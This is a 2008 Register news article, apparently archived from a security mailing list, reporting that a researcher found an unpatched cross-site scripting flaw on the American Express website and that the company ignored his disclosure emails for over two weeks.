http://www.theregister.co.uk/2008/12/16/american_express_website_bug/ By Dan Goodin in San Francisco The Register 16th December 2008 Updated - A glaring vulnerability on the American Express website has unnecessarily put visitors at risk for more than two weeks and violates industry regulations governing credit card companies, a security researcher says. Among other things, the cross-site scripting (XSS) error on americanexpress.com allows attackers to steal users' authentication cookies, which are used to validate American Express customers after they enter their login credentials. Depending on how the website is designed, miscreants could use the cookies to access customer account sections, said Russ McRee of the Holistic Security blog. A URL demonstrating this weakness is here. McRee aired the American Express dirty laundry here after spending more than two weeks trying in vain to get someone inside the company to fix the problem. After getting no response from lower level employees, he emailed a director of a department responsible for information security at Amex. None of his emails was answered. "I believe they have an obligation to respond, even if it's brief and callous," McRee told El Reg. "You don't have to be polite. Just fix it." American Express proudly proclaims itself as a founding member of the PCI Security Standards Council, the group that forges the rules governing the Payment Card Industry. McRee says PCI's Data Security Standards expressly hold that XSS errors are a violation of those rules, so Amex's inaction carries a fair amount of irony. [...] _______________________________________________ Help InfoSecNews.org with a donation! http://www.infosecnews.org/donate.htmlReceived on Thu Dec 18 2008 - 01:27:20 PST
This archive was generated by hypermail 2.2.0 : Thu Dec 18 2008 - 01:37:17 PST